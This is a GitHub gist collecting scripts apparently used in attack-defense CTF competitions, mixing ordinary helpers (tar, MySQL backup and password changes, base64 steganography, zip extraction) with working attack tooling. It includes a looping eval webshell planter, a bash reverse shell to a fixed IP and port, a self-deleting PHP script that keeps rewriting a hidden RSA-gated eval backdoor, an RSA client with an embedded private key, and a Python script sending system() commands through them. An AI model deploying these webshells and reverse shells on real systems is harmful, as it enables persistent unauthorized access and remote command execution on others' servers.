Skip to content

Instantly share code, notes, and snippets.

@XuCcc

XuCcc/README.md

Last active July 23, 2020 08:59
Show Gist options
  • Save XuCcc/5cbf5271474c78bfef9753613647686d to your computer and use it in GitHub Desktop.
Save XuCcc/5cbf5271474c78bfef9753613647686d to your computer and use it in GitHub Desktop.
Download ZIP
CTF 常用脚本搜集
Raw
awd_misc.md
  • tar -zcvf www.tar.gz directory_to_compress
  • tar -zxvf www.tar.gz
  • pass=123456 whlie true;do echo '<?php if(md5($_GET[pass])=="e10adc3949ba59abbe56e057f20f883e"){@eval($_GET[a]);} ?>' > index.php;sleep 1;done;
  • bash -i >& /dev/tcp/10.173.93.252/9998 0>&1
Raw
base64_stego_decode.py
def deStego(stegoFile):
b64table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
with open(stegoFile,'r') as stegoText:
message = ""
for line in stegoText:
try:
text = line[line.index("=") - 1:-1]
message += "".join([ bin( 0 if i == '=' else b64table.find(i))[2:].zfill(6) for i in text])[2 if text.count('=') ==2 else 4:6]
except:
pass
return "".join([chr(int(message[i:i+8],2)) for i in range(0,len(message),8)])
Raw
base64_stego_encode.py
def enStego(sourceFile,setgoFile,message):
b64table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
with open(sourceFile,'r') as sourceText, open(setgoFile,'w') as setgoText:
message = "".join([bin(ord(i))[2:].zfill(8) for i in message])
for line in sourceText:
text = base64.b64encode(line[:-1].encode("utf-8")).decode("utf-8")
l = text.count('=')
if 0 < 2*l <= len(message):
text = text[:-l-1] + b64table[b64table.index(text[-l-1])+int(message[:2*l],2)] + text[-l:]
message = message[2*l:]
setgoText.write(text+'\n')
if not len(message):
break
return len(message)
Raw
mysql.md
  • backup
    • mysqldump -u{user} -p{pwd} {database} > bak.sql
    • mysqldump -u{user} -p{pwd} --single-transaction --all-databases > bak.sql
    • mysql -u{user} -p{pwd} {database} < bak.sql

Modify Password

  1. 登录 mysql 终端,运行:
mysql> set password=password('new password');
mysql>flush privileges;
  1. 修改 mysql user 表
mysql>use mysql;
mysql>update user set password=password('new password') where user='root';
mysql>flush privileges;
  1. 使用 GRANT 语句
mysql>GRANT ALL PRIVILEGES ON *.* TO 'root'@'127.0.0.1' IDENTIFIED BY 'new password' WITH GRANT OPTION;
mysql>flush privileges;

  1. mysqladmin [root@ubuntu]# mysqladmin -u root password "new password";(注意双引号或不加)

  2. 批量脚本

import subprocess
import uuid


def change_password(host, user, pwd, port=3306, new_pwd=uuid.uuid4().hex):
    cmd = f'mysqladmin -h{host} -u{user} -p{pwd} -P{port} password {new_pwd}'
    try:
        r, msg = subprocess.getstatusoutput(cmd)
    except Exception as e:
        print(f'[-] change {user}:{pwd}@{host} fail: ' + e)
    else:
        if r != 0:
            print(f'[-] {user}:{pwd}@{host} => {new_pwd} fail: ' + msg)
        else:
            print(f'[+] {user}:{pwd}@{host} => {new_pwd} success')
Raw
nodiersa_serve.php
<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__);
$path = '.index.php';
$shell = '<?php
class Rsa
{
private static $PUBLIC_KEY = "-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCkZA+AgALF5LWzT7BwP5SlIx05
vwjKi4RAVr1H7nc4RBcGvCSQBLWeDW02yGjryXbSbfCvziJeJzJaNU0LUzhzpa8H
mGE7nrJWT1RuFcv7htHfrB0FGRaRbHtB5Y4MYwbTjV9cRpSEBGORyGGHu4PNN5Ag
jjHclBhGfC9F86Jr/QIDAQAB
-----END PUBLIC KEY-----
";
private static function getPublicKey()
{
$publicKey = self::$PUBLIC_KEY;
return openssl_pkey_get_public($publicKey);
}
public static function publicDecrypt($encrypted = "")
{
if (!is_string($encrypted)) {
return null;
}
return (openssl_public_decrypt(base64_decode($encrypted), $decrypted, self::getPublicKey())) ? $decrypted : null;
}
}
if (isset($_GET["cmd"])) {
$cmd = $_POST["cmd"];
$rsa = new Rsa();
$publicDecrypt = $rsa->publicDecrypt($cmd);
eval($publicDecrypt);
} elseif (isset($_GET[\'input\'])) {
$phpInput = file_get_contents(\'php://input\');
eval($phpInput);
}
';
while (1) {
file_put_contents($path, $shell);
sleep(5);
}
Raw
rsa_client.php
<?php
class Rsa
{
private static $PRIVATE_KEY = '-----BEGIN RSA PRIVATE KEY-----
MIICXwIBAAKBgQCkZA+AgALF5LWzT7BwP5SlIx05vwjKi4RAVr1H7nc4RBcGvCSQ
BLWeDW02yGjryXbSbfCvziJeJzJaNU0LUzhzpa8HmGE7nrJWT1RuFcv7htHfrB0F
GRaRbHtB5Y4MYwbTjV9cRpSEBGORyGGHu4PNN5AgjjHclBhGfC9F86Jr/QIDAQAB
AoGBAJhMS0BVWDxWgy+4aFHV1bSYL39MSKy9TKz+ryVw++qYymxm6cizVD81WTUj
vnCTmQ2i5RU6+AQadD+2mcYgN28QeilLl7d2G9J7pdM+yO/KkQGv3tM7gii1h9AE
3C8j6WpFAt1TeM98WWH1peKPUExaqfa5l97tgd4vLUftSlBRAkEA1JG9mT55D2iB
880dAUSsQ/htWsnPuCHJg59yn5c+OKpjxgPEuW6q6uWOeOWAiSF1i1CSw8B/ITjp
SN6XwOjH8wJBAMX6YxW/foRYhEy4LjMwaH5ud9zZsnFX7oQNSUZZ47xlc09sUAg9
S5xdN4NUU3lXe4h3iomijymBMF4n0cGmaE8CQQDR1O/Y9v9fw2UMejwYhWabTf78
sNx4Qfn/EQWAHjcQjrogvJWUCndzmpjyJHKmaz3yAN5vl3SnIdu+z+PzTJYbAkEA
gbNa7KmKwjuXWQekxMZm/sVyY05/t/+qc/qcUamcKBWyqIrGF8/IVEVBlBlPooQs
myftq+PCtKc9P8IIijxxwwJBALZaqDCvIXH2xqUZfhXNeodx1NkjvOiffpqoTE3u
h9/ASY7+VKhWJ/IkOLRZNmkEMCT0Hxr9jFqJ4InTDJtARs0=
-----END RSA PRIVATE KEY-----';
private static function getPrivateKey()
{
$privKey = self::$PRIVATE_KEY;
return openssl_pkey_get_private($privKey);
}
public static function privEncrypt($data = '')
{
if (!is_string($data)) {
return null;
}
return openssl_private_encrypt($data, $encrypted, self::getPrivateKey()) ? base64_encode($encrypted) : null;
}
}
$rsa = new Rsa();
$cmd = $_POST['cmd'];
if ($cmd !== Null) {
$privEncrypt = $rsa->privEncrypt($cmd);
echo $privEncrypt;
}
Raw
rsa_poc.py
import requests
import base64
def attack(server, client, cmd):
enpoc = requests.post(client, data={'cmd': f"system('{cmd}');"}).content
res = requests.post(server, data={'cmd': enpoc})
res.encoding = 'utf-8'
return res.text
Raw
unzip.py
def unzip(filename,pwd):
zf = zipfile.ZipFile(filename)
for t in zf.namelist():
zf.extract(t, '.', bytes(pwd, encoding='utf-8'))
return t
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment